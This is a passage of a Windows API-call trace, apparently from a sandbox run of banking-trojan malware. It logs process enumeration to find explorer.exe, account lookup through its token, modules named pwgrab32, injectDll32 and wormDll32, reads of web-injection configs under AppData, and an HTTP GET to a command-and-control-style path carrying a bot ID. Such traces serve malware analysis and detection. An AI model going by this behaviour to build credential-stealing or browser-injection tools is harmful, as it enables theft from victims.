	[0251.361] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.361] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.361] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.362] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.362] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0251.363] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0251.363] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.364] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.364] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0251.365] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0251.365] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.366] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0251.366] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.367] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.367] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.368] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0251.368] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0251.369] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0251.369] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0251.370] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0251.370] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0251.371] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0251.371] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0251.372] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0251.372] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0251.373] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0251.373] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0251.373] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0251.374] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0251.374] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0251.374] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0251.375] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0251.375] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0251.376] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0251.376] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0251.377] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0251.377] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0251.378] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0251.378] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0251.411] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0251.411] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0251.412] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0251.412] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0251.412] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0251.412] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0251.413] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0251.413] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0251.414] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0251.414] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0251.415] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0251.415] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0251.416] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0251.416] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0251.417] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0251.417] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.418] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0251.418] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.419] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0251.419] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.420] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0251.420] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0251.421] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0251.421] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.422] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.422] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.423] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.423] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.424] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.424] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.424] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.424] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.425] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0251.425] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.426] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.426] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.427] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.427] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.428] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0251.428] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.429] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0251.429] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.430] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0251.430] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.431] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.431] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0251.432] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0251.432] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.433] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0251.433] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.434] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0251.434] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0251.435] CloseHandle (hObject=0x700) returned 1
	[0251.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0251.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff510
	[0251.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807360
	[0251.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x700
	[0251.435] OpenProcessToken (in: ProcessHandle=0x700, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x668) returned 1
	[0251.435] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0251.435] GetLastError () returned 0x7a
	[0251.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x27daf40
	[0251.435] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x27daf40, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x27daf40, ReturnLength=0x128c98) returned 1
	[0251.435] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x27daf48*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0251.436] CloseHandle (hObject=0x668) returned 1
	[0251.436] CloseHandle (hObject=0x700) returned 1
	[0251.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c27e0
	[0251.436] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0251.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfdd8
	[0251.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0251.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807468
	[0251.436] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0251.437] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0251.437] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0251.437] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0251.437] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0251.437] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0251.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0251.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807468) returned 1
	[0251.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0251.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff510) returned 1
	[0251.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226160
	[0251.437] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0251.437] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0251.437] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0251.437] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0251.437] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0251.437] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0251.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0251.437] Sleep (dwMilliseconds=0x4e20) 
	[0251.473] Sleep (dwMilliseconds=0x4e20) 
	[0251.520] Sleep (dwMilliseconds=0x4e20) 
	[0251.546] Sleep (dwMilliseconds=0x4e20) 
	[0251.554] Sleep (dwMilliseconds=0x4e20) 
	[0251.566] Sleep (dwMilliseconds=0x4e20) 
	[0251.582] Sleep (dwMilliseconds=0x4e20) 
	[0251.598] Sleep (dwMilliseconds=0x4e20) 
	[0251.657] Sleep (dwMilliseconds=0x4e20) 
	[0251.691] Sleep (dwMilliseconds=0x4e20) 
	[0251.738] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7da8eee0, dwHighDateTime=0x1d50a6a)) 
	[0251.739] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0251.739] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0251.739] GetFileTime (in: hFile=0x700, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x7cece240, dwHighDateTime=0x1d50a6a)) returned 1
	[0251.739] CloseHandle (hObject=0x700) returned 1
	[0251.739] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7da8eee0, dwHighDateTime=0x1d50a6a)) 
	[0251.739] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0251.739] GetFileTime (in: hFile=0x700, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0251.740] CloseHandle (hObject=0x700) returned 1
	[0251.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7da8eee0, dwHighDateTime=0x1d50a6a)) 
	[0251.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7da8eee0, dwHighDateTime=0x1d50a6a)) 
	[0251.740] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0251.740] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0251.740] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/sinj/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0251.740] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x1283d0, dwBufferLength=0x4) returned 1
	[0251.740] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0252.719] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0252.719] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x1283c0, lpdwBufferLength=0x1283bc, lpdwIndex=0x0 | out: lpBuffer=0x1283c0*, lpdwBufferLength=0x1283bc*=0x4, lpdwIndex=0x0) returned 1
